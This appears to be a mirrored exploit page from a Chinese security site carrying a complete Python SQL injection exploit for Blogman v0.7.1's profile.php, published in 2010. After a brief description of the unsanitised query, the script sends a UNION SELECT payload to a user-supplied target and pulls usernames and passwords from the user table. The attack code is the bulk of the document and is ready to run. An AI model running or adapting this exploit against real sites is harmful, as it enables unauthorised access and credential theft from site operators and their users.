首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Blogman v0.7.1 (profile.php) SQL Injection Exploit
来源:research[at]ptrace-security[dot]com 作者:Security 发布时间:2010-08-30  

#!/usr/bin/python
#
# Exploit Title:   Blogman v0.7.1 (profile.php) SQL Injection Exploit
# Date         :   28 August 2010
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/blogman/
# Version      :   0.7.1
# Tested on    :   EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + profile.php => SQL Injection!!
#
# 6:    $query = "SELECT * FROM ".$GLOBALS['dbTablePrefix']."user WHERE
#       UserID='".$_GET['id']."'";
# 7:    $profileuser = mysql_fetch_array(mysql_query($query));
#
# + profile.php => The query showed above returns a 16-columns table. UserName,
#   which is the 2nd column's name, is used few line after the query to display
#   the information extracted.
#
# 12:   echo $profileuser['UserName']."</p>\n";
#

import re
import sys
import http.client
import urllib.parse


def usage(prog):
    print('Usage  : ' + prog + ' <target> <path> <user_id>\n')
    print('Example: ' + prog + ' localhost /blogman/ 2')
    print('         ' + prog + ' www.example.com /complete/path/ 1')
    return


def exploit(target, path, userid):
    payload  = 'profile.php?id=-1%27%20UNION%20SELECT%20NULL,%20CONCAT(%27%3C1'
    payload += '%3E%27,UserName,%27:%27,UserPassword,%27%3C2%3E%27),%20NULL,%20'
    payload += 'NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,'
    payload += '%20NULL,%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20blogman_user'
    payload += '%20WHERE%20UserID=%27' + str(userid) + '%27%20--%20%27'

    print('[+] Sending HTTP Request')
    con = http.client.HTTPConnection(target)
    con.request('GET', path + payload)
    res = con.getresponse()
   
    if res.status != 200:
        print('[!] HTTP GET request failed.')
        exit(1)

    print('[+] Parsing HTTP Response')
    data = res.read().decode()
    pattern = re.compile(r"<1>(.+?)<2>", re.M)
    m = pattern.search(data)

    if m:
        print('[+] Information Extracted:\n')
        print(m.group()[3:-3])
    else:
        print('[!] No information found')
       
    return


print('\n+-----------------------------------------------------------------------+')
print('| Blogman v0.7.1 (profile.php) SQL Injection Exploit by Ptrace Security |')
print('+-----------------------------------------------------------------------+\n')

if len(sys.argv) != 4:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])

exit(0)

 

   


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Leadtools ActiveX Raster Twain
·nginx v0.6.38 Heap Corruption
·McAfee LinuxShield <= 1.5.1 Lo
·SnackAmp 3.1.2 Malicious SMP B
·Linux Kernel < 2.6.36-rc1 CAN
·SnackAmp 3.1.2 Malicious WAV B
·bsd/x86-bindshell on port 2525
·Exploit Title: Mozilla Thunder
·Mozilla Firefox 3.6.8 Adobe Re
·mini CMS / News Script Light 1
·Microsoft Windows wscript.exe
·Hycus CMS 1.0.1 Multiple Cross
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved